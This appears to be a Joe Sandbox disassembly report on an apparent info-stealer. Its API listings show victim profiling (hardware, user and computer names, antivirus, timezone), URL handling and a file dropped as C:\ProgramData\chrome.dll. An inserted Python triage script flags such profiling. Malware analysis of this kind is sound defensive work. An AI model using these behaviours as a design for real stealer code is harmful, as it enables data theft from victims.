• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID: CurrentBuildNumber
• API String ID: 3466090806-1022791448
• Opcode ID: 62c3cde62baf978702572b2c811dca918f5f591e513f32891fd12165dca4f55c
• Instruction ID: 254a5b9cc17808c74aa07b0f2586ef431af4f682249609233b9b362a06fcf409
• Opcode Fuzzy Hash: 62c3cde62baf978702572b2c811dca918f5f591e513f32891fd12165dca4f55c
• Instruction Fuzzy Hash: 7AF03A71640209BFEB205B91EC0EFAF7ABAEB84B04F648058F701A5199EBB159009B14
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
• GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
• ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
• LocalFree.KERNEL32(00FEEECA,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8679
• CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$Local$AllocCloseCreateFreeHandleReadSize
• String ID:
• API String ID: 2311089104-0
• Opcode ID: 7be388fbf2e6cfba05183786b8ba02ee68c56442c67a110b89efd5ea50648145
• Instruction ID: 12c95bfbcfd32060ccad34709f341b62ad0579f8c845759f571a3ab18712fb8c
• Opcode Fuzzy Hash: 7be388fbf2e6cfba05183786b8ba02ee68c56442c67a110b89efd5ea50648145
• Instruction Fuzzy Hash: 16119D70900244EFDF21AFA5DC4CEAE7BB9EB84390F204548FA09A2194DB718E42EB50
APIs
• VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 00FE109A
• _memset.LIBCMT ref: 00FE10C0
• VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00FE10D6
• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00FF7F4E), ref: 00FE10F0
• VirtualAllocExNuma.KERNEL32(00000000), ref: 00FE10F7
• ExitProcess.KERNEL32 ref: 00FE1102
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1859398019-0
                                                                                                                                                                                                                                                          • Opcode ID: 1ea66bbd864fb7ab8474b6ef0f7b77ad710644b252d5b2cdf813b5f924346068
                                                                                                                                                                                                                                                          • Instruction ID: 4a155ee3b0a278cff49d5902ad7ff3220d956242ad6385dc1253186b049d056d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea66bbd864fb7ab8474b6ef0f7b77ad710644b252d5b2cdf813b5f924346068
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0F672B8135177F23252772C5DFAB2A6CAB41F62F204014F348EB2C0D7AA9944B774
APIs
• _memset.LIBCMT ref: 00FF18F1
  • Part of subcall function 00FF27A7: malloc.MSVCRT ref: 00FF27AC
  • Part of subcall function 00FF27A7: strncpy.MSVCRT ref: 00FF27BD
• lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
• lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
• GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
• String ID: Unknown
• API String ID: 2781187439-1654365787
• Opcode ID: 0222365b310b4c94ecc564fb6400236815354d87fe7ccea5b2b0247d60bd6aba
• Instruction ID: b1491cbdb234ab022d5f7744c6cf58a4579ffe62dbee94a931730d4f27f057b8
• Opcode Fuzzy Hash: 0222365b310b4c94ecc564fb6400236815354d87fe7ccea5b2b0247d60bd6aba
• Instruction Fuzzy Hash: 8C118132A0011CABDB21EB65DC45BDD73B8AF04300F4004E1F745E7152DAB8AA849F94
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF1354
• HeapAlloc.KERNEL32(00000000), ref: 00FF135B
• GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00FF1377
• wsprintfA.USER32 ref: 00FF139D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
• String ID: %d MB
• API String ID: 3644086013-2651807785
• Opcode ID: e6e3c628b6c3b6b5392570ccbb00be824715df628ae05e43cb213b03729db32c
• Instruction ID: bec9a5005d44550c3457ec7fdc5a314a6823adeb63185daea72a408655eb34d5
• Opcode Fuzzy Hash: e6e3c628b6c3b6b5392570ccbb00be824715df628ae05e43cb213b03729db32c
• Instruction Fuzzy Hash: 9A018671A0021CAFDB14EFB4DC49ABE77B9FF45310F444429F702E7154DA7499419754
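The two functions above (the one at 00FF18C2 that calls GetCurrentHwProfileA and concatenates the result with lstrcatA, falling back to the string "Unknown", and the one at 00FF1354 that reads physical memory via GlobalMemoryStatusEx and formats it as "%d MB" next to the labels "Keyboard Languages:", "Display Resolution:", "User Name:", "Computer Name:", "AV:" and "Install Date:") are the sample's victim-profile collection. The following triage script is an added example, not part of the Joe Sandbox report: it parses the report's own "APIs" bullets into records, pulls out the resolved string arguments (the profile field labels) and flags the function as system profiling when two or more fingerprint sources are present. The PROFILING_APIS table beyond the two APIs the report references is this example's assumption about where the remaining labelled fields usually come from.

```python
import json
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: the "APIs" bullets copied from the two profiling
# functions in this report (sub-call bullets keep their leading spaces).
REPORT_API_LINES = """\
• _memset.LIBCMT ref: 00FF18F1
  • Part of subcall function 00FF27A7: malloc.MSVCRT ref: 00FF27AC
  • Part of subcall function 00FF27A7: strncpy.MSVCRT ref: 00FF27BD
• lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
• lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
• GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
  • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
• GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,010158F8,Display Resolution: ,010158DC,00000000,User Name: ,010158CC,00000000,Computer Name: ,010158B8,AV: ,010158AC,Install Date: ), ref: 00FF1354
• HeapAlloc.KERNEL32(00000000), ref: 00FF135B
• GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00FF1377
• wsprintfA.USER32 ref: 00FF139D
"""

# Assumption of this example (not from the report): Win32 APIs a stealer
# reads to fill the victim-profile fields whose labels appear as string
# arguments above. Only the first two are referenced in the report; the
# others are listed so the rule also fires on neighbouring functions.
PROFILING_APIS = {
    "GetCurrentHwProfileA": "hardware profile GUID (HWID seed)",
    "GlobalMemoryStatusEx": "physical memory size (formatted as '%d MB')",
    "GetUserNameA": "User Name",
    "GetComputerNameA": "Computer Name",
    "GetKeyboardLayoutList": "Keyboard Languages",
    "GetSystemMetrics": "Display Resolution",
}

_HEX32 = re.compile(r"[0-9A-F]{8}")
_LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?"
    r",? ref: (?P<ref>[0-9A-F]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                       # address of the call site
    args: list = field(default_factory=list)
    subcall: Optional[str] = None  # parent function when "Part of subcall"


def parse_api_lines(text: str) -> list:
    """Turn the report's API bullets into ApiCall records; lines that do
    not match the bullet grammar are skipped rather than guessed at."""
    calls = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), m.group("ref"),
                             args, m.group("sub")))
    return calls


def string_args(calls: list) -> list:
    """Arguments that are neither '?' (unresolved) nor an 8-digit hex
    address/constant are string literals the sandbox resolved."""
    out = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not _HEX32.fullmatch(a):
                out.append(a)
    return out


def find_profiling_calls(calls: list) -> list:
    return [c for c in calls if c.api in PROFILING_APIS]


def summarize(text: str) -> dict:
    calls = parse_api_lines(text)
    hits = find_profiling_calls(calls)
    return {
        "profiling_apis": sorted({c.api for c in hits}),
        "what_is_collected": sorted({PROFILING_APIS[c.api] for c in hits}),
        "profile_labels": string_args(calls),
        # two independent fingerprint sources plus labelled fields is a
        # strong sign of victim profiling rather than ordinary setup code
        "is_profiling": len({c.api for c in hits}) >= 2,
    }


if __name__ == "__main__":
    print(json.dumps(summarize(REPORT_API_LINES), indent=2))
```

Run as a script to get the JSON summary; paste the "APIs" bullets of any other function from the report into REPORT_API_LINES to triage it the same way. The regex deliberately requires the `ref: <addr>` suffix so that stray text never becomes a fake API record.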
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0
APIs
• ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
• ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
• ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
• lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
• InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: CrackInternetlstrlen
• String ID:
• API String ID: 1274457161-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914), ref: 00FF1188
• HeapAlloc.KERNEL32(00000000,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF118F
• RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ), ref: 00FF11AD
• RegQueryValueExA.KERNEL32(01015870,00000000,00000000,00000000,000000FF,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000), ref: 00FF11C9
• RegCloseKey.ADVAPI32(01015870,?,?,?,00FF442F,Processor: ,[Hardware],01015938,00000000,TimeZone: ,01015928,00000000,Local Time: ,01015914,Keyboard Languages: ,010158F8), ref: 00FF11D2
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocCloseOpenProcessQueryValue
• String ID:
• API String ID: 3466090806-0
APIs
• Sleep.KERNEL32(000003E8,?,?), ref: 00FF70DB
• CreateThread.KERNEL32(00000000,00000000,00FF6FA3,?,00000000,00000000), ref: 00FF7113
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00FF711B
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: CreateObjectSingleSleepThreadWait
• String ID:
• API String ID: 4198075804-0
• Opcode ID: 3114c9b2cc096f015566fafe3aaba5447a3d433a802cf7337f2e0cd1377291ca
• Instruction ID: d462efa753b94ba4068c7925a4676e7a5bfb1e86e265e7d5687366c49d2ae404
• Opcode Fuzzy Hash: 3114c9b2cc096f015566fafe3aaba5447a3d433a802cf7337f2e0cd1377291ca
• Instruction Fuzzy Hash: E421077680021DABCF10EF65EC458EEBBB8AF41314F008166FA01A7265DB34AA46DF90
APIs
• CreateFileA.KERNEL32(00FEECA7,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2832
• WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2859
• CloseHandle.KERNEL32(00000000,?,?,00FEECA7,C:\ProgramData\chrome.dll,?,?,?), ref: 00FF2870
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID:
• API String ID: 1065093856-0
• Opcode ID: cc8e8962300f317f487fba321e0b77c0a4a6422050f10012619ab0328ffa1fa1
• Instruction ID: 5f60e84ef1dcb8890007e7c1aced85c579c5b61b01ac2f66d2f63ca89225d01c
• Opcode Fuzzy Hash: cc8e8962300f317f487fba321e0b77c0a4a6422050f10012619ab0328ffa1fa1
• Instruction Fuzzy Hash: 49F0307254011CBFDB516EA5EC8AEEB3B5CEF167D4F004122FA1296161D7A19D01BBA0
APIs
• OpenProcess.KERNEL32(00000410,00000000,00FF3FC7,00000000,?), ref: 00FF248F
• K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00FF24AA
• CloseHandle.KERNEL32(00000000), ref: 00FF24B1
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3183270410-0
                                                                                                                                                                                                                                                          • Opcode ID: d363a23ff586faba156b1f86aaee5762fe13d6bf07035d430dd8c9650b67cbfa
                                                                                                                                                                                                                                                          • Instruction ID: aebfbf1b474f85e7f92c5720fabaff0562bf82451c57e992c444cac97ba5e0b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d363a23ff586faba156b1f86aaee5762fe13d6bf07035d430dd8c9650b67cbfa
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF0903660020CABD760EAA8AC49FFEB7B89F45700F004069F744D7190DFB8E9858B94
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE1375), ref: 00FF0EB4
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00FE1375), ref: 00FF0EBB
                                                                                                                                                                                                                                                          • GetComputerNameA.KERNEL32(00000000,00FE1375), ref: 00FF0ECF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4203777966-0
                                                                                                                                                                                                                                                          • Opcode ID: f032edc58ad1bb718ce2abf69626579ba890dee61b9f40c7eb0c237cd4e769cb
                                                                                                                                                                                                                                                          • Instruction ID: 4cfbf9c6b2ea9134eedd31b90b3e729e163ad4cb9a333430d31fe2d50f12563d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f032edc58ad1bb718ce2abf69626579ba890dee61b9f40c7eb0c237cd4e769cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9E08CB6200208ABD720CB99DC0DE9B76ECEB80B11F040015FA45C2144DAF99984A760
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6CD60AB0
                                                                                                                                                                                                                                                            • Part of subcall function 6CD60EDE: InitializeSListHead.KERNEL32(6CDB7A28,6CD60ABA,6CDB5718,00000010,6CD60A4B,?,?,?,6CD60C73,?,00000001,?,?,00000001,?,6CDB5760), ref: 6CD60EE3
                                                                                                                                                                                                                                                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CD60B1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3231365870-0
                                                                                                                                                                                                                                                          • Opcode ID: ad0c08fbcca25956d4ff9785dbec72604859d57e763d5d5dcd2a38ec35082ba1
                                                                                                                                                                                                                                                          • Instruction ID: 9d8b67c309a1462bc293906148c46aa610022c33591a4888e9600fe3af6c90dd
